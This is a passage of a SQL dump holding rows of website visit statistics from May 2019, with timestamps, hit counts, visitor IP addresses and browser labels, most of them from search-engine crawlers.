249.66.220','chrome'),(422540,1558730281,1,1,0,0,'178.154.244.11','other'),(422541,1558730794,1,1,0,0,'157.55.39.118','other'),(422542,1558731558,2,2,0,0,'66.249.66.220','chrome'),(422543,1558733162,1,1,0,0,'95.163.255.189','other'),(422544,1558733615,1,1,0,0,'207.46.13.222','other'),(422545,1558733860,1,1,0,0,'95.163.255.92','other'),(422546,1558734617,1,1,0,0,'40.77.167.71','other'),(422547,1558735487,1,1,0,0,'66.249.66.220','chrome'),(422548,1558735621,1,1,0,0,'40.77.167.71','other'),(422549,1558735765,3,3,0,0,'178.154.244.11','other'),(422550,1558736392,1,1,0,0,'5.45.207.79','other'),(422551,1558736560,1,1,0,0,'66.249.66.128','chrome'),(422552,1558736576,1,1,0,0,'141.8.142.103','other'),(422553,1558737330,1,1,0,0,'66.249.66.222','chrome'),(422554,1558737342,3,3,0,0,'66.249.66.218','chrome'),(422555,1558737423,1,1,0,0,'95.163.255.193','other'),(422556,1558737607,1,1,0,0,'8.29.198.25','other'),(422557,1558737831,1,1,0,0,'8.29.198.26','other'),(422558,1558738806,1,1,0,0,'207.46.13.45','other'),(422559,1558739275,1,1,0,0,'66.249.66.128','chrome'),(422560,1558739773,1,1,0,0,'66.249.66.220','chrome'),(422561,1558740077,2,2,0,0,'66.249.66.218','chrome'),(422562,1558740092,1,1,0,0,'95.163.255.98','other'),(422563,1558742379,1,1,0,0,'66.249.66.218','chrome'),(422564,1558742507,1,1,0,0,'87.250.224.65','other'),(422565,1558742520,1,1,0,0,'5.45.207.19','other'),(422566,1558742677,1,1,0,0,'95.108.213.4','other'),(422567,1558742883,1,1,0,0,'66.249.66.128','chrome'),(422568,1558743293,1,1,0,0,'46.166.137.216','other'),(422569,1558744067,1,1,0,0,'5.45.207.19','other'),(422570,1558744136,1,1,0,0,'95.163.255.98','other'),(422571,1558744147,1,1,0,0,'157.55.39.114','other'),(422572,1558745124,1,1,0,0,'66.249.66.222','chrome'),(422573,1558745159,1,1,0,0,'66.249.66.218','chrome'),(422574,1558745675,1,1,0,0,'40.77.167.30','other'),(422575,1558745822,1,1,0,0,'95.163.255.92','other'),(422576,1558746296,1,1,0,0,'95.163.255.96','other'),(422577,1558746418,1,1,0,0,'66.249.66.222','chrome'),(422578,1558747481,1,1,0,0,'66.249.66.128','chrome'),(422579,1558747486,1,1,0,0,'66.249.66.220','chrome'),(422580,1558748032,2,2,0,0,'40.77.167.48','other'),(422581,1558748257,1,1,0,0,'95.163.255.176','other'),(422582,1558748461,1,1,0,0,'8.29.198.27','other'),(422583,1558748680,1,1,0,0,'95.163.255.190','other'),(422584,1558748689,1,1,0,0,'8.29.198.26','other'),(422585,1558748709,1,1,0,0,'66.249.66.130','chrome'),(422586,1558748957,1,1,0,0,'95.163.255.96','other'),(422587,1558749405,1,1,0,0,'95.163.255.155','other'),(422588,1558750006,2,2,0,0,'157.55.39.190','other'),(422589,1558750091,1,1,0,0,'66.249.66.220','chrome'),(422590,1558750186,1,1,0,0,'40.77.167.146','other'),(422591,1558750600,1,1,0,0,'66.249.66.222','chrome'),(422592,1558751717,3,3,0,0,'66.249.66.222','chrome'),(422593,1558751876,1,1,0,0,'95.163.255.94','other'),(422594,1558752116,1,1,0,0,'66.249.66.220','chrome'),(422595,1558752141,1,1,0,0,'95.163.255.95','other'),(422596,1558752168,2,2,0,0,'66.249.66.218','chrome'),(422597,1558752184,1,1,0,0,'5.45.207.79','other'),(422598,1558752224,1,1,0,0,'95.163.255.96','other'),(422599,1558752706,1,1,0,0,'40.77.167.48','other'),(422600,1558752920,1,1,0,0,'157.55.39.190','other'),(422601,1558753145,1,1,0,0,'66.249.66.222','chrome'),(422602,1558753431,1,1,0,0,'5.45.207.79','other'),(422603,1558753859,2,2,0,0,'54.244.44.171','chrome'),(422604,1558754593,1,1,0,0,'66.249.66.220','chrome'),(422605,1558754869,1,1,0,0,'95.163.255.99','other'),(422606,1558755056,1,1,0,0,'40.77.167.146','other'),(422607,1558755222,1,1,0,0,'207.46.13.70','other'),(422608,1558755253,1,1,0,0,'66.249.66.222','chrome'),(422609,1558755383,1,1,0,0,'66.249.66.218','chrome'),(422610,1558755561,1,1,0,0,'178.154.244.11','other'),(422611,1558756920,1,1,0,0,'66.249.66.130','chrome'),(422612,1558756925,2,2,0,0,'5.45.207.79','other'),(422613,1558757284,1,1,0,0,'95.108.213.4','other'),(422614,1558757351,1,1,0,0,'66.249.66.128','chrome'),(422615,1558757908,1,1,0,0,'95.163.255.97','other'),(422616,1558758441,3,3,0,0,'66.249.66.218','chrome'),(422617,1558758468,1,1,0,0,'207.46.13.233','other'),(422618,1558758515,1,1,0,0,'40.77.167.48','other'),(422619,1558759311,2,2,0,0,'8.29.198.25','other'),(422620,1558759627,1,1,0,0,'207.46.13.233','other'),(422621,1558760113,1,1,0,0,'66.249.66.218','chrome'),(422622,1558760556,1,1,0,0,'95.163.255.188','other'),(422623,1558761043,1,1,0,0,'95.108.213.4','other'),(422624,1558761097,1,1,0,0,'207.46.13.233','other'),(422625,1558761161,1,1,0,0,'141.8.142.103','other'),(422626,1558761174,2,2,0,0,'178.154.244.11','other'),(422627,1558761381,1,1,0,0,'5.45.207.19','other'),(422628,1558761418,1,1,0,0,'87.250.224.47','other'),(422629,1558762273,1,1,0,0,'185.100.86.182','other'),(422630,1558762573,1,1,0,0,'40.77.167.146','other'),(422631,1558762955,1,1,0,0,'209.17.96.250','other'),(422632,1558763000,1,1,0,0,'66.249.66.220','chrome'),(422633,1558763363,1,1,0,0,'66.249.66.222','chrome'),(422634,1558763953,1,1,0,0,'66.249.66.132','chrome'),(422635,1558764226,1,1,0,0,'66.249.66.218','chrome'),(422636,1558764453,2,2,0,0,'40.77.167.147','other'),(422637,1558764492,1,1,0,0,'95.163.255.98','other'),(422638,1558764562,1,1,0,0,'66.249.66.130','chrome'),(422639,1558764622,1,1,0,0,'95.163.255.93','other'),(422640,1558765487,1,1,0,0,'141.8.142.103','other'),(422641,1558765776,1,1,0,0,'5.45.207.79','other'),(422642,1558766044,2,2,0,0,'207.46.13.46','other'),(422643,1558766619,1,1,0,0,'95.163.255.167','other'),(422644,1558766785,1,1,0,0,'213.180.203.40','other'),(422645,1558766843,1,1,0,0,'46.242.118.205','msie'),(422646,1558766936,2,2,0,0,'207.46.13.171','other'),(422647,1558767346,1,1,0,0,'37.9.113.20','other'),(422648,1558767389,2,2,0,0,'66.249.66.222','chrome'),(422649,1558767751,3,3,0,0,'66.249.66.218','chrome'),(422650,1558767784,2,2,0,0,'66.249.66.132','chrome'),(422651,1558767844,22,22,0,0,'18.234.88.196','other'),(422652,1558767955,1,1,0,0,'66.249.66.220','chrome'),(422653,1558768384,1,1,0,0,'66.249.66.222','chrome'),(422654,1558768859,9,9,0,0,'18.234.88.196','other'),(422655,1558769274,1,1,0,0,'207.46.13.113','other'),(422656,1558769850,1,1,0,0,'5.45.207.19','other'),(422657,1558769949,10,10,0,0,'18.234.88.196','other'),(422658,1558770135,1,1,0,0,'5.45.207.8','other'),(422659,1558770154,1,1,0,0,'178.154.244.11','other'),(422661,1558770156,1,1,0,0,'8.29.198.27','other'),(422662,1558770205,1,1,0,0,'37.9.113.20','other'),(422663,1558770239,1,1,0,0,'87.250.224.65','other'),(422664,1558770291,1,1,0,0,'95.108.181.54','other'),(422665,1558770420,1,1,0,0,'141.8.142.38','other'),(422667,1558770421,1,1,0,0,'8.29.198.25','other'),(422668,1558770481,1,1,0,0,'95.163.255.92','other'),(422669,1558770482,1,1,0,0,'37.9.113.13','other'),(422670,1558770525,1,1,0,0,'95.163.255.161','other'),(422671,1558770547,1,1,0,0,'95.163.255.99','other'),(422672,1558770553,1,1,0,0,'95.163.255.94','other'),(422673,1558770586,1,1,0,0,'178.154.171.27','other'),(422674,1558770590,1,1,0,0,'178.154.200.8','other'),(422675,1558770678,1,1,0,0,'95.163.255.98','other'),(422676,1558771023,14,14,0,0,'18.234.88.196','other'),(422677,1558771527,1,1,0,0,'141.8.142.108','other'),(422678,1558771651,1,1,0,0,'91.196.178.129','firefox'),(422679,1558771996,12,12,0,0,'18.234.88.196','other'),(422680,1558772489,1,1,0,0,'207.46.13.113','other'),(422681,1558772614,1,1,0,0,'95.163.255.95','other'),(422682,1558773494,1,1,0,0,'66.249.66.222','chrome'),(422683,1558773497,1,1,0,0,'40.77.167.33','other'),(422684,1558773520,1,1,0,0,'95.163.255.184','other'),(422685,1558774073,1,1,0,0,'157.55.39.124','other'),(422686,1558774129,1,1,0,0,'66.249.66.220','chrome'),(422687,1558775042,1,1,0,0,'66.249.66.222','chrome'),(422688,1558775046,1,1,0,0,'207.46.13.233','other'),(422689,1558775347,1,1,0,0,'213.180.203.9','other'),(422690,1558775471,1,1,0,0,'95.108.181.75','other'),(422691,1558775892,2,2,0,0,'66.249.66.218','chrome'),(422692,1558776094,1,1,0,0,'95.163.255.99','other'),(422693,1558776101,1,1,0,0,'207.46.13.101','other'),(422694,1558776340,1,1,0,0,'178.154.171.27','other'),(422695,1558776794,1,1,0,0,'176.36.21.189','chrome'),(422696,1558776931,1,1,0,0,'95.163.255.94','other'),(422697,1558777422,1,1,0,0,'66.249.66.218','chrome'),(422698,1558777451,1,1,0,0,'95.163.255.152','other'),(422699,1558777656,1,1,0,0,'66.249.66.220','chrome'),(422700,1558777942,1,1,0,0,'157.55.39.124','other'),(422701,1558778725,1,1,0,0,'66.249.66.130','chrome'),(422702,1558778848,1,1,0,0,'109.74.154.72','chrome'),(422703,1558778912,1,1,0,0,'37.9.113.148','other'),(422704,1558779028,1,1,0,0,'66.249.66.220','chrome'),(422705,1558779521,1,1,0,0,'95.163.255.181','other'),(422706,1558779559,1,1,0,0,'207.46.13.212','other'),(422707,1558780034,1,1,0,0,'207.46.13.113','other'),(422708,1558780276,1,1,0,0,'66.249.66.220','chrome'),(422709,1558780711,1,1,0,0,'178.154.244.49','other'),(422710,1558780770,1,1,0,0,'178.154.244.11','other'),(422711,1558780999,1,1,0,0,'8.29.198.25','other'),(422712,1558781278,1,1,0,0,'8.29.198.27','other'),(422713,1558781293,1,1,0,0,'157.55.39.72','other'),(422714,1558781357,1,1,0,0,'193.106.30.100','chrome'),(422715,1558781445,1,1,0,0,'213.180.203.9','other'),(422716,1558781684,1,1,0,0,'95.163.255.97','other'),(422717,1558781863,3,3,0,0,'35.224.54.167','chrome'),(422718,1558781911,3,3,0,0,'35.193.71.118','chrome'),(422719,1558781926,3,3,0,0,'35.224.64.237','chrome'),(422720,1558781988,1,1,0,0,'95.163.255.96','other'),(422721,1558782064,1,1,0,0,'141.8.183.23','other'),(422722,1558782068,1,1,0,0,'5.45.207.19','other'),(422723,1558782358,1,1,0,0,'5.45.207.8','other'),(422724,1558782524,2,2,0,0,'157.55.39.72','other'),(422725,1558782588,2,2,0,0,'66.249.66.222','chrome'),(422726,1558784397,1,1,0,0,'66.249.66.218','chrome'),(422727,1558784568,1,1,0,0,'207.46.13.68','other'),(422728,1558784632,1,1,0,0,'66.249.66.222','chrome'),(422729,1558784704,1,1,0,0,'95.163.255.98','other'),(422730,1558784822,1,1,0,0,'128.124.224.209','chrome'),(422731,1558785126,1,1,0,0,'95.163.255.191','other'),(422732,1558785376,1,1,0,0,'212.180.208.122','chrome'),(422733,1558785480,2,2,0,0,'5.45.207.79','other'),(422734,1558785483,2,2,0,0,'37.9.113.148','other'),(422735,1558785512,1,1,0,0,'87.250.224.65','other'),(422736,1558785599,1,1,0,0,'87.250.224.47','other'),(422737,1558785817,1,1,0,0,'141.8.142.103','other'),(422738,1558786581,1,1,0,0,'66.249.66.130','chrome'),(422739,1558786845,1,1,0,0,'87.250.224.47','other'),(422740,1558787787,1,1,0,0,'157.55.39.163','other'),(422741,1558788038,1,1,0,0,'95.163.255.97','other'),(422742,1558788366,1,1,0,0,'95.163.255.93','other'),(422743,1558788689,1,1,0,0,'66.249.66.220','chrome'),(422744,1558788764,1,1,0,0,'66.249.66.218','chrome'),(422745,1558788981,1,1,0,0,'40.77.167.118','other'),(422746,1558789824,1,1,0,0,'157.55.39.163','other'),(422747,1558790177,1,1,0,0,'87.250.224.65','other'),(422748,1558790334,1,1,0,0,'178.154.244.11','other'),(422749,1558790376,1,1,0,0,'95.163.255.95','other'),(422750,1558790432,1,1,0,0,'157.55.39.56','other'),(422751,1558790914,1,1,0,0,'207.46.13.211','other'),(422752,1558790922,1,1,0,0,'91.245.76.253','chrome'),(422753,1558791589,2,2,0,0,'66.249.66.222','chrome'),(422754,1558791703,1,1,0,0,'213.180.203.17','other'),(422755,1558791839,2,2,0,0,'8.29.198.25','other'),(422756,1558791900,1,1,0,0,'66.249.66.128','chrome'),(422757,1558791921,1,1,0,0,'66.249.66.220','chrome'),(422758,1558791943,1,1,0,0,'66.249.66.218','chrome'),(422759,1558792859,1,1,0,0,'178.255.215.94','other'),(422760,1558793870,1,1,0,0,'66.249.66.220','chrome'),(422761,1558794398,1,1,0,0,'157.55.39.56','other'),(422762,1558794469,3,3,0,0,'178.154.244.11','other'),(422763,1558795280,1,1,0,0,'37.9.113.148','other'),(422764,1558795376,1,1,0,0,'141.8.142.103','other'),(422765,1558795433,1,1,0,0,'5.45.207.19','other'),(422766,1558795779,1,1,0,0,'207.46.13.222','other'),(422767,1558795782,1,1,0,0,'95.108.213.4','other'),(422768,1558795844,2,2,0,0,'157.55.39.56','other'),(422769,1558795942,1,1,0,0,'66.249.66.220','chrome'),(422770,1558799453,1,1,0,0,'207.46.13.90','other'),(422771,1558799462,3,3,0,0,'5.45.207.19','other'),(422772,1558799620,2,2,0,0,'5.45.207.79','other'),(422773,1558799724,1,1,0,0,'178.154.244.11','other'),(422774,1558799840,1,1,0,0,'95.108.213.4','other'),(422775,1558800734,1,1,0,0,'207.46.13.90','other'),(422776,1558801305,1,1,0,0,'157.55.39.136','other'),(422777,1558801554,1,1,0,0,'91.196.178.72','chrome'),(422778,1558801980,2,2,0,0,'207.46.13.222','other'),(422779,1558802151,1,1,0,0,'46.118.195.57','chrome'),(422780,1558802661,1,1,0,0,'207.46.13.211','other'),(422781,1558802677,1,1,0,0,'8.29.198.27','other'),(422782,1558802985,1,1,0,0,'8.29.198.26','other'),(422783,1558803554,1,1,0,0,'91.209.11.236','other'),(422784,1558803718,1,1,0,0,'5.45.207.8','other'),(422785,1558803796,1,1,0,0,'5.45.207.19','other'),(422786,1558803894,1,1,0,0,'5.45.207.79','other'),(422787,1558803919,2,2,0,0,'37.9.113.20','other'),(422788,1558804468,1,1,0,0,'95.163.255.183','other'),(422789,1558805301,1,1,0,0,'95.163.255.92','other'),(422790,1558805329,1,1,0,0,'5.45.207.19','other'),(422791,1558805337,1,1,0,0,'207.46.13.113','other'),(422792,1558805608,2,2,0,0,'46.4.52.175','other'),(422793,1558805639,49,49,0,0,'144.76.60.198','other'),(422794,1558805753,1,1,0,0,'91.209.11.236','other'),(422795,1558806191,1,1,0,0,'157.55.39.136','other'),(422796,1558806271,1,1,0,0,'207.46.13.220','other'),(422797,1558806657,119,119,0,0,'144.76.60.198','other'),(422798,1558806825,2,2,0,0,'91.209.11.236','other'),(422799,1558807150,3,3,0,0,'5.45.207.19','other'),(422800,1558807413,1,1,0,0,'95.108.213.4','other'),(422801,1558807783,1,1,0,0,'91.209.11.236','other'),(422802,1558808061,1,1,0,0,'188.255.12.150','msie'),(422803,1558808835,1,1,0,0,'176.8.91.216','chrome'),(422804,1558809088,1,1,0,0,'95.163.255.189','other'),(422805,1558809213,1,1,0,0,'91.196.177.15','firefox'),(422806,1558809753,1,1,0,0,'180.76.15.149','other'),(422807,1558810070,1,1,0,0,'157.55.39.136','other'),(422808,1558810137,2,2,0,0,'5.45.207.79','other'),(422809,1558810143,1,1,0,0,'66.249.66.220','chrome'),(422810,1558810789,1,1,0,0,'95.163.255.152','other'),(422811,1558810816,1,1,0,0,'141.8.142.103','other'),(422812,1558811008,1,1,0,0,'95.108.213.4','other'),(422813,1558811046,1,1,0,0,'87.250.224.47','other'),(422814,1558811146,1,1,0,0,'95.163.255.155','other'),(422815,1558811152,1,1,0,0,'5.45.207.79','other'),(422816,1558811353,1,1,0,0,'95.163.255.165','other'),(422817,1558811602,1,1,0,0,'95.163.255.96','other'),(422818,1558811753,1,1,0,0,'180.76.15.33','other'),(422819,1558811933,110,110,0,0,'144.76.29.149','other'),(422820,1558812219,1,1,0,0,'207.46.13.113','other'),(422821,1558812337,1,1,0,0,'5.45.207.8','other'),(422822,1558812340,1,1,0,0,'141.8.142.144','other'),(422823,1558812567,2,2,0,0,'157.55.39.139','other'),(422824,1558813145,62,62,0,0,'5.9.156.30','other'),(422825,1558813149,2,2,0,0,'207.46.13.220','other'),(422826,1558813523,1,1,0,0,'8.29.198.26','other'),(422827,1558813834,1,1,0,0,'8.29.198.25','other'),(422828,1558813943,1,1,0,0,'178.154.200.48','other'),(422829,1558813954,1,1,0,0,'95.108.181.96','other'),(422830,1558813957,1,1,0,0,'87.250.224.47','other'),(422831,1558813994,3,3,0,0,'95.108.213.4','other'),(422832,1558814576,1,1,0,0,'95.163.255.96','other'),(422833,1558814590,2,2,0,0,'95.163.255.95','other'),(422834,1558814775,1,1,0,0,'66.249.66.222','chrome'),(422835,1558814957,1,1,0,0,'66.249.66.218','chrome'),(422836,1558815772,1,1,0,0,'157.55.39.139','other'),(422837,1558816486,1,1,0,0,'207.46.13.113','other'),(422838,1558816506,1,1,0,0,'207.46.13.220','other'),(422839,1558816911,1,1,0,0,'95.163.255.191','other'),(422840,1558817074,1,1,0,0,'95.163.255.99','other'),(422841,1558817835,1,1,0,0,'207.46.13.94','other'),(422842,1558817881,1,1,0,0,'157.55.39.139','other'),(422843,1558818077,2,2,0,0,'207.46.13.113','other'),(422844,1558818287,2,2,0,0,'91.209.11.236','other'),(422845,1558818814,1,1,0,0,'66.249.66.220','chrome'),(422846,1558819369,1,1,0,0,'207.46.13.94','other'),(422847,1558819769,1,1,0,0,'157.55.39.136','other'),(422848,1558819927,1,1,0,0,'157.55.39.139','other'),(422849,1558820177,1,1,0,0,'213.180.203.17','other'),(422850,1558820236,1,1,0,0,'213.180.203.40','other'),(422851,1558820309,1,1,0,0,'141.8.132.16','other'),(422852,1558820313,1,1,0,0,'141.8.183.23','other'),(422853,1558820335,1,1,0,0,'95.163.255.196','other'),(422854,1558820424,1,1,0,0,'141.8.142.38','other'),(422855,1558821151,1,1,0,0,'91.124.181.19','chrome'),(422856,1558822638,1,1,0,0,'91.209.11.236','other'),(422857,1558822652,1,1,0,0,'207.46.13.74','other'),(422858,1558822770,1,1,0,0,'95.163.255.182','other'),(422859,1558823096,1,1,0,0,'50.17.84.9','firefox'),(422860,1558823131,1,1,0,0,'95.163.255.98','other'),(422861,1558823839,1,1,0,0,'91.209.11.236','other'),(422862,1558823849,1,1,0,0,'157.55.39.134','other'),(422863,1558824099,1,1,0,0,'141.8.132.16','other'),(422864,1558824102,1,1,0,0,'37.9.113.20','other'),(422865,1558824140,1,1,0,0,'5.45.207.19','other'),(422866,1558824358,1,1,0,0,'8.29.198.27','other'),(422867,1558824683,1,1,0,0,'8.29.198.25','other'),(422868,1558825094,1,1,0,0,'207.46.13.74','other'),(422869,1558826256,1,1,0,0,'157.55.39.139','other'),(422870,1558826442,1,1,0,0,'207.46.13.74','other'),(422871,1558826569,1,1,0,0,'207.46.13.95','other'),(422872,1558826647,1,1,0,0,'91.209.11.236','other'),(422873,1558826970,1,1,0,0,'207.46.13.113','other'),(422874,1558827203,1,1,0,0,'40.77.167.193','other'),(422875,1558828129,1,1,0,0,'95.163.255.157','other'),(422876,1558828218,1,1,0,0,'66.249.66.218','chrome'),(422877,1558828436,1,1,0,0,'157.55.39.139','other'),(422878,1558828456,1,1,0,0,'87.250.224.47','other'),(422879,1558828461,1,1,0,0,'95.163.255.171','other'),(422880,1558830247,1,1,0,0,'178.154.244.11','other'),(422881,1558830931,1,1,0,0,'66.249.66.220','chrome'),(422882,1558831043,3,3,0,0,'207.46.13.95','other'),(422883,1558831211,1,1,0,0,'91.209.11.236','other'),(422884,1558831272,4,4,0,0,'5.45.207.79','other'),(422885,1558832252,2,2,0,0,'157.55.39.212','other'),(422886,1558832391,3,3,0,0,'66.249.66.128','chrome'),(422887,1558832958,1,1,0,0,'66.249.66.218','chrome'),(422888,1558832970,1,1,0,0,'157.55.39.139','other'),(422889,1558833720,1,1,0,0,'66.249.66.130','chrome'),(422890,1558833924,1,1,0,0,'95.163.255.160','other'),(422891,1558834569,3,3,0,0,'207.46.13.2','other'),(422892,1558834999,1,1,0,0,'178.154.244.11','other'),(422893,1558835129,2,2,0,0,'5.45.207.19','other'),(422894,1558835181,1,1,0,0,'66.249.66.220','chrome'),(422895,1558835186,1,1,0,0,'66.249.66.218','chrome'),(422896,1558835200,1,1,0,0,'8.29.198.26','other'),(422897,1558835201,1,1,0,0,'5.45.207.79','other'),(422898,1558835306,1,1,0,0,'95.163.255.94','other'),(422899,1558835515,1,1,0,0,'141.8.142.103','other'),(422900,1558835550,1,1,0,0,'8.29.198.27','other'),(422901,1558836165,1,1,0,0,'5.45.207.79','other'),(422902,1558836177,1,1,0,0,'95.163.255.167','other'),(422903,1558836456,2,2,0,0,'207.46.13.95','other'),(422904,1558836497,1,1,0,0,'207.46.13.74','other'),(422905,1558837123,1,1,0,0,'95.163.255.152','other'),(422906,1558837276,1,1,0,0,'87.250.224.47','other'),(422907,1558837722,1,1,0,0,'178.255.215.94','other'),(422908,1558838448,2,2,0,0,'66.249.66.222','chrome'),(422909,1558838726,1,1,0,0,'95.163.255.93','other'),(422910,1558838740,1,1,0,0,'178.154.244.11','other'),(422911,1558838780,1,1,0,0,'5.45.207.19','other'),(422912,1558838802,1,1,0,0,'5.45.207.79','other'),(422913,1558839274,1,1,0,0,'207.46.13.95','other'),(422914,1558839522,2,2,0,0,'54.191.180.145','chrome'),(422915,1558839781,2,2,0,0,'207.46.13.17','other'),(422916,1558841064,1,1,0,0,'13.66.139.0','other'),(422917,1558841648,1,1,0,0,'207.46.13.193','other'),(422918,1558841921,1,1,0,0,'91.196.178.132','firefox'),(422919,1558842411,1,1,0,0,'178.154.244.11','other'),(422920,1558842543,1,1,0,0,'141.8.142.108','other'),(422921,1558842590,2,2,0,0,'5.45.207.79','other'),(422922,1558842646,1,1,0,0,'95.108.181.54','other'),(422923,1558842819,1,1,0,0,'66.249.66.218','chrome'),(422924,1558843344,1,1,0,0,'207.46.13.176','other'),(422925,1558843616,1,1,0,0,'66.249.66.222','chrome'),(422926,1558844233,1,1,0,0,'66.249.66.218','chrome'),(422927,1558844318,1,1,0,0,'40.77.167.103','other'),(422928,1558844829,1,1,0,0,'95.163.255.93','other'),(422929,1558845201,1,1,0,0,'193.106.30.100','firefox'),(422930,1558846036,1,1,0,0,'8.29.198.25','other'),(422931,1558846216,1,1,0,0,'95.163.255.196','other'),(422932,1558846397,1,1,0,0,'8.29.198.27','other'),(422933,1558846535,1,1,0,0,'95.108.213.4','other'),(422934,1558846860,1,1,0,0,'95.163.255.151','other'),(422935,1558847671,1,1,0,0,'95.163.255.98','other'),(422936,1558847717,2,2,0,0,'178.154.244.11','other'),(422937,1558847810,1,1,0,0,'176.36.21.189','chrome'),(422938,1558847962,1,1,0,0,'157.55.39.56','other'),(422939,1558847965,2,2,0,0,'5.45.207.19','other'),(422940,1558848395,2,2,0,0,'66.249.66.218','chrome'),(422941,1558848879,1,1,0,0,'40.77.167.103','other'),(422942,1558849253,1,1,0,0,'66.249.66.220','chrome'),(422943,1558849831,1,1,0,0,'5.255.253.38','other'),(422944,1558850468,1,1,0,0,'40.77.167.103','other'),(422945,1558850565,1,1,0,0,'95.163.255.172','other'),(422946,1558850595,2,2,0,0,'95.163.255.95','other'),(422947,1558850952,1,1,0,0,'95.108.213.4','other'),(422948,1558851017,1,1,0,0,'141.8.142.103','other'),(422949,1558851165,1,1,0,0,'5.45.207.79','other'),(422950,1558852561,1,1,0,0,'40.77.167.103','other'),(422951,1558852863,1,1,0,0,'207.46.13.120','other'),(422952,1558853081,1,1,0,0,'185.222.202.65','other'),(422953,1558853672,2,2,0,0,'66.249.66.218','chrome'),(422954,1558854261,1,1,0,0,'95.163.255.194','other'),(422955,1558854861,1,1,0,0,'66.249.66.220','chrome'),(422956,1558855155,1,1,0,0,'40.77.167.103','other'),(422957,1558855237,1,1,0,0,'87.250.224.64','other'),(422958,1558855378,2,2,0,0,'157.55.39.56','other'),(422959,1558855530,1,1,0,0,'37.9.113.148','other'),(422960,1558855552,1,1,0,0,'157.55.39.121','other'),(422961,1558855588,1,1,0,0,'213.180.203.40','other'),(422962,1558855726,1,1,0,0,'87.250.224.65','other'),(422963,1558855905,1,1,0,0,'66.249.66.220','chrome'),(422964,1558855918,1,1,0,0,'178.154.200.48','other'),(422965,1558856121,1,1,0,0,'207.46.13.176','other'),(422966,1558856524,1,1,0,0,'40.77.167.103','other'),(422967,1558856542,1,1,0,0,'66.249.66.222','chrome'),(422968,1558856861,1,1,0,0,'95.163.255.98','other'),(422969,1558856873,1,1,0,0,'8.29.198.26','other'),(422970,1558857237,1,1,0,0,'8.29.198.27','other'),(422971,1558857282,2,2,0,0,'66.249.66.218','chrome'),(422972,1558857534,2,2,0,0,'157.55.39.56','other'),(422973,1558858767,1,1,0,0,'66.249.66.220','chrome'),(422974,1558859928,1,1,0,0,'95.163.255.96','other'),(422975,1558859937,1,0,1,0,'66.249.66.218',''),(422976,1558859992,1,1,0,0,'207.46.13.217','other'),(422977,1558860107,1,1,0,0,'5.164.148.68','firefox'),(422978,1558860632,1,1,0,0,'13.66.139.0','other'),(422979,1558861044,1,1,0,0,'178.154.171.27','other'),(422980,1558861186,2,2,0,0,'87.250.224.118','other'),(422981,1558861352,1,1,0,0,'5.45.207.76','other'),(422982,1558861428,1,1,0,0,'141.8.142.162','other'),(422983,1558861506,1,1,0,0,'87.250.224.47','other'),(422984,1558861624,1,1,0,0,'178.154.244.11','other'),(422985,1558861737,1,1,0,0,'66.249.66.222','chrome'),(422986,1558861820,1,1,0,0,'66.249.66.132','chrome'),(422987,1558863155,1,1,0,0,'180.76.15.25','other'),(422988,1558863552,1,1,0,0,'95.163.255.177','other'),(422989,1558864633,1,1,0,0,'207.46.13.217','other'),(422990,1558865254,1,1,0,0,'109.74.154.72','chrome'),(422991,1558865275,1,1,0,0,'157.55.39.214','other'),(422992,1558865790,1,1,0,0,'95.163.255.98','other'),(422993,1558865792,1,1,0,0,'95.163.255.92','other'),(422994,1558865840,1,1,0,0,'95.163.255.93','other'),(422995,1558865910,1,1,0,0,'95.163.255.197','other'),(422996,1558866719,1,1,0,0,'106.38.241.144','other'),(422997,1558866915,1,1,0,0,'141.8.142.103','other'),(422998,1558866924,1,1,0,0,'178.154.171.24','other'),(422999,1558867057,1,1,0,0,'37.9.113.38','other'),(423000,1558867157,1,1,0,0,'87.250.224.47','other'),(423001,1558867170,1,1,0,0,'5.45.207.76','other'),(423002,1558867222,1,1,0,0,'157.55.39.214','other'),(423003,1558867368,1,1,0,0,'178.154.244.11','other'),(423004,1558867557,1,1,0,0,'5.45.207.19','other'),(423005,1558867724,1,1,0,0,'8.29.198.26','other'),(423006,1558868102,1,1,0,0,'8.29.198.25','other'),(423007,1558868312,3,3,0,0,'35.193.191.97','chrome'),(423008,1558868369,3,3,0,0,'35.192.169.19','chrome'),(423009,1558868382,2,2,0,0,'35.192.110.164','chrome'),(423011,1558868408,2,2,0,0,'35.239.102.32','chrome'),(423012,1558868777,1,1,0,0,'207.46.13.217','other'),(423013,1558869543,1,1,0,0,'91.196.178.133','firefox'),(423014,1558869881,1,1,0,0,'87.250.224.47','other'),(423015,1558870150,1,1,0,0,'13.66.139.0','other'),(423016,1558870160,1,1,0,0,'46.211.49.220','chrome'),(423017,1558871750,1,1,0,0,'95.163.255.98','other'),(423018,1558872192,1,1,0,0,'46.211.74.142','chrome'),(423019,1558872850,2,2,0,0,'40.77.167.60','other'),(423020,1558872993,1,1,0,0,'46.133.65.234','chrome'),(423021,1558873351,1,1,0,0,'87.250.224.65','other'),(423022,1558873386,1,1,0,0,'37.9.113.148','other'),(423023,1558873413,1,1,0,0,'178.154.244.65','other'),(423024,1558873468,2,2,0,0,'95.108.213.4','other'),(423025,1558873617,1,1,0,0,'5.45.207.79','other'),(423026,1558873634,1,1,0,0,'141.8.142.144','other'),(423027,1558873673,1,1,0,0,'178.154.200.48','other'),(423028,1558874226,1,1,0,0,'178.255.215.94','other'),(423029,1558874448,1,1,0,0,'66.249.66.222','chrome'),(423030,1558874504,1,1,0,0,'95.163.255.93','other'),(423031,1558874777,1,1,0,0,'87.250.224.47','other'),(423032,1558874780,1,1,0,0,'178.154.244.11','other'),(423033,1558875655,1,1,0,0,'207.46.13.217','other'),(423034,1558875724,1,1,0,0,'178.255.215.94','other'),(423035,1558875837,2,2,0,0,'40.77.167.21','other'),(423036,1558876960,1,1,0,0,'46.166.186.212','other'),(423037,1558877819,1,1,0,0,'95.163.255.96','other'),(423038,1558877888,1,1,0,0,'95.163.255.93','other'),(423039,1558878054,1,1,0,0,'95.158.42.201','firefox'),(423040,1558878390,2,2,0,0,'40.77.167.135','other'),(423041,1558878561,2,2,0,0,'8.29.198.27','other'),(423042,1558878829,1,1,0,0,'66.249.66.220','chrome'),(423043,1558879044,1,1,0,0,'66.249.66.130','chrome'),(423044,1558879303,1,1,0,0,'141.8.142.103','other'),(423045,1558879312,1,1,0,0,'37.9.113.148','other'),(423046,1558879332,1,1,0,0,'95.179.184.120','chrome'),(423047,1558879453,1,1,0,0,'5.45.207.79','other'),(423048,1558879754,1,1,0,0,'157.55.39.211','other'),(423049,1558879830,1,1,0,0,'66.249.66.222','chrome'),(423050,1558880597,85,85,0,0,'62.210.201.91','msie'),(423051,1558882360,1,